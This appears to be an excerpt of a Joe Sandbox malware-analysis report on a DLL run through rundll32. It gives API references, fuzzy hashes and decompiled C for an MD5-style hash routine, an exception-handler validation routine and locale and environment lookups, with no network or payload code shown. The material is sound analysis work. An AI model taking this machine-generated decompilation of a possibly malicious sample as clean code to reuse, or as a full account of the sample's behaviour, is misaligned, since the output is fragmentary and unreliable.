APIs

GetEnvironmentVariableW.KERNEL32(70380290,70399AA0,0000069D,?,7038028C), ref: 70350CF1

Strings

C:\Windows\system32, xrefs: 703507D1, 703507E7, 703507FF, 70350800, 7035081A, 7035082D, 70350844, 70350845, 703508C3, 703508D6, 703508EF, 703508F0

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: EnvironmentVariable
String ID: C:\Windows\system32
API String ID: 1431749950-2896066436
Opcode ID: 668c9a44873cc989595212bf42781a762fa8cc85337bd436845b895f34556c7b
Instruction ID: b60d813ff021981e1b34e6f48eb00a8a1fbb8baaac24b1bff4f76bdce5ca1479
Opcode Fuzzy Hash: 668c9a44873cc989595212bf42781a762fa8cc85337bd436845b895f34556c7b
Instruction Fuzzy Hash: EC22AF72A102058FD708CF79CD91B6D77B9FB44314F2106AAE41BEF6E0E735A8098B61

Uniqueness

Uniqueness Score: -1.00%

Function 7034DF36, Relevance: 3.2, APIs: 2, Instructions: 156COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7034DF38
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7034DFFE

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6119154e7d1e3e865074753e00b4fea0112594e7416b43e2f854069aceb14617
Instruction ID: b071d7ad450998a19b42638fb747a9c356012fae03c521c0d3b11a62d0171a9b
Opcode Fuzzy Hash: 6119154e7d1e3e865074753e00b4fea0112594e7416b43e2f854069aceb14617
Instruction Fuzzy Hash: B0519A705006179EDB298F25C982B7EB3F9FF00308F109269F813CA188E7B4E991CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C21754, Relevance: 1.9, APIs: 1, Instructions: 610
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E00C21754(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}

0x00c21757
0x00c21762
0x00c21765
0x00c21768
0x00c21769
0x00c21769
0x00c21774
0x00c21785
0x00c21787
0x00c2178a
0x00c2178a
0x00c2178d
0x00c2178d
0x00c21790
0x00c21790
0x00c21793
0x00c21793
0x00c217b0
0x00c217b3
0x00c217c9
0x00c217cc
0x00c217e6
0x00c217e9
0x00c217ff
0x00c21802
0x00c21804
0x00c2181c
0x00c2181f
0x00c21822
0x00c2183a
0x00c2183d
0x00c21857
0x00c2185a
0x00c21870
0x00c21873
0x00c21875
0x00c2188d
0x00c21892
0x00c21895
0x00c218ab
0x00c218ae
0x00c218c8
0x00c218cb
0x00c218e1
0x00c218e4
0x00c218e6
0x00c21901
0x00c21904
0x00c2191b
0x00c2191e
0x00c21922
0x00c2193b
0x00c2193e
0x00c21940
0x00c21943
0x00c2195e
0x00c21961
0x00c2197a
0x00c2197d
0x00c2198d
0x00c21990
0x00c219a8
0x00c219ab
0x00c219c5
0x00c219c8
0x00c219e0
0x00c219e3
0x00c219f9
0x00c219fc
0x00c21a14
0x00c21a17
0x00c21a2f
0x00c21a32
0x00c21a4c
0x00c21a4f
0x00c21a65
0x00c21a68
0x00c21a80
0x00c21a83
0x00c21a9d
0x00c21aa0
0x00c21ab8
0x00c21abb
0x00c21ad1
0x00c21ad4
0x00c21aec
0x00c21aef
0x00c21b07
0x00c21b0a
0x00c21b1c
0x00c21b1f
0x00c21b31
0x00c21b34
0x00c21b46
0x00c21b49
0x00c21b4d
0x00c21b5d
0x00c21b60
0x00c21b6e
0x00c21b71
0x00c21b83
0x00c21b86
0x00c21b9a
0x00c21b9d
0x00c21b9f
0x00c21baf
0x00c21bb2
0x00c21bc4
0x00c21bc7
0x00c21bd5
0x00c21bd8
0x00c21bea
0x00c21bed
0x00c21bf1
0x00c21c01
0x00c21c04
0x00c21c16
0x00c21c19
0x00c21c27
0x00c21c2a
0x00c21c3c
0x00c21c3f
0x00c21c51
0x00c21c54
0x00c21c68
0x00c21c6b
0x00c21c7f
0x00c21c82
0x00c21c96
0x00c21c99
0x00c21cad
0x00c21cb0
0x00c21cc4
0x00c21cc7
0x00c21cdb
0x00c21ce0
0x00c21cf2
0x00c21cf5
0x00c21d09
0x00c21d0c
0x00c21d20
0x00c21d23
0x00c21d39
0x00c21d3c
0x00c21d50
0x00c21d53
0x00c21d65
0x00c21d68
0x00c21d7c
0x00c21d7f
0x00c21d93
0x00c21d96
0x00c21daa
0x00c21db3
0x00c21db6
0x00c21dbf
0x00c21dc8
0x00c21dd0
0x00c21dd8
0x00c21de2
0x00c21df7

APIs

memset.NTDLL ref: 00C21DEB

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: fa325bdafb3c154772591fba5ceccab0c0e74e448f976aa4e7506c66901bd3b1
Instruction ID: ebe3ed59785af7eb91b51fd92c179adbe10f3edf87d2cd12fc6f1d94113b8f80
Opcode Fuzzy Hash: fa325bdafb3c154772591fba5ceccab0c0e74e448f976aa4e7506c66901bd3b1
Instruction Fuzzy Hash: 0B22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 70348AA5, Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,70348AA0,?,?,?,?,?,?,00000000), ref: 70348CD2

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: a75ecbb530bf78b2ebb4b5e7fa5e954cb59608894ebf8a00a6143e646be852cb
Instruction ID: 7e65799defd9a8233706a6e35450deb9c08842a514bc884e0a45fc5b0639a55c
Opcode Fuzzy Hash: a75ecbb530bf78b2ebb4b5e7fa5e954cb59608894ebf8a00a6143e646be852cb
Instruction Fuzzy Hash: FDB125716116088FD705CF28C486A69BBF5FF46364F26965CF99ACF2A1C335E982CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00C28055, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C28055(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xc2a330; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xc2a378 = 1;
										__eflags =  *0xc2a378;
										if( *0xc2a378 != 0) {
											goto L60;
										}
										_t84 =  *0xc2a330; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xc2a378 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xc2a330 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xc2a338 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xc2a334 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xc2a338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xc2a338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xc2a378 = 1;
							__eflags =  *0xc2a378;
							if( *0xc2a378 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xc2a338 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xc2a338 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xc2a378 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xc2a338 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xc2a330 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xc2a338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xc2a338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x00c2805f
0x00c28062
0x00c28068
0x00c28086
0x00000000
0x00c28086
0x00c28070
0x00c28079
0x00c2807f
0x00c2808e
0x00c28091
0x00c28094
0x00c2809e
0x00c2809e
0x00c280a0
0x00c280a3
0x00c280a5
0x00c280a5
0x00c280a7
0x00c280aa
0x00000000
0x00000000
0x00c280ac
0x00c280ae
0x00c28114
0x00c28114
0x00c28272
0x00000000
0x00c28272
0x00c280b0
0x00c280b0
0x00c280b4
0x00c280b6
0x00c280b6
0x00c280b6
0x00c280b6
0x00c280b9
0x00c280ba
0x00c280bd
0x00c280bd
0x00c280c1
0x00c280c5
0x00c280d3
0x00c280d3
0x00c280db
0x00c280e1
0x00c280e3
0x00c280e5
0x00c280f5
0x00c28102
0x00c28106
0x00c2810b
0x00c2810d
0x00c2818b
0x00c2818b
0x00c2810f
0x00c2810f
0x00c2810f
0x00c2818d
0x00c2818f
0x00c28270
0x00c28270
0x00000000
0x00c28195
0x00c28195
0x00c2819c
0x00000000
0x00000000
0x00c281a2
0x00c281a6
0x00c28202
0x00c28204
0x00c2820c
0x00c2820e
0x00c28210
0x00000000
0x00000000
0x00c28212
0x00c28218
0x00c2821a
0x00c2821c
0x00c28231
0x00c28231
0x00c28233
0x00c28262
0x00c28269
0x00000000
0x00c28269
0x00c28237
0x00c28238
0x00c2823a
0x00c2823c
0x00c2823c
0x00c2823e
0x00c28240
0x00c28242
0x00c28256
0x00c28256
0x00c28259
0x00c2825b
0x00c2825b
0x00c2825c
0x00c2825c
0x00000000
0x00c28244
0x00c28244
0x00c28244
0x00c2824d
0x00c2824e
0x00c28250
0x00c28252
0x00c28252
0x00000000
0x00c28244
0x00c28242
0x00c2821e
0x00c28225
0x00c28225
0x00c28227
0x00000000
0x00000000
0x00c28229
0x00c2822a
0x00c2822d
0x00c2822f
0x00000000
0x00000000
0x00000000
0x00c2822f
0x00000000
0x00c28225
0x00c281a8
0x00c281ab
0x00c281b0
0x00000000
0x00000000
0x00c281b9
0x00c281bb
0x00c281c1
0x00000000
0x00000000
0x00c281c7
0x00c281cd
0x00000000
0x00000000
0x00c281d3
0x00c281d5
0x00c281de
0x00c281e2
0x00000000
0x00000000
0x00c281e8
0x00c281eb
0x00c281ed
0x00000000
0x00000000
0x00c281f4
0x00c281f6
0x00000000
0x00000000
0x00c281f8
0x00c281fc
0x00000000
0x00000000
0x00000000
0x00c281fc
0x00000000
0x00000000
0x00000000
0x00c280e7
0x00c280e7
0x00c280e7
0x00c280ee
0x00000000
0x00000000
0x00c280f0
0x00c280f1
0x00c280f3
0x00000000
0x00000000
0x00000000
0x00c280f3
0x00c2811b
0x00c2811d
0x00000000
0x00000000
0x00c2812d
0x00c2812f
0x00c28131
0x00000000
0x00000000
0x00c28137
0x00c2813e
0x00c2816a
0x00c2816a
0x00c2816c
0x00c2816e
0x00c28182
0x00c28184
0x00000000
0x00000000
0x00000000
0x00000000
0x00c28170
0x00c28170
0x00c28170
0x00c28179
0x00c2817a
0x00c2817c
0x00c2817e
0x00c2817e
0x00000000
0x00c28170
0x00c28140
0x00c28140
0x00c28143
0x00c28145
0x00c28157
0x00c28157
0x00c2815a
0x00c2815c
0x00c2815c
0x00c2815d
0x00c2815d
0x00c28163
0x00c28163
0x00000000
0x00000000
0x00000000
0x00000000
0x00c28147
0x00c28147
0x00c28147
0x00c2814e
0x00000000
0x00000000
0x00c28150
0x00c28150
0x00c28151
0x00000000
0x00000000
0x00000000
0x00c28151
0x00c28153
0x00c28155
0x00c28168
0x00000000
0x00000000
0x00000000
0x00c28168
0x00000000
0x00c28155
0x00c280c7
0x00c280ca
0x00c280cd
0x00000000
0x00000000
0x00c280cf
0x00c280d1
0x00000000
0x00000000
0x00000000
0x00c280d1
0x00c28096
0x00c28098
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00C28106

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

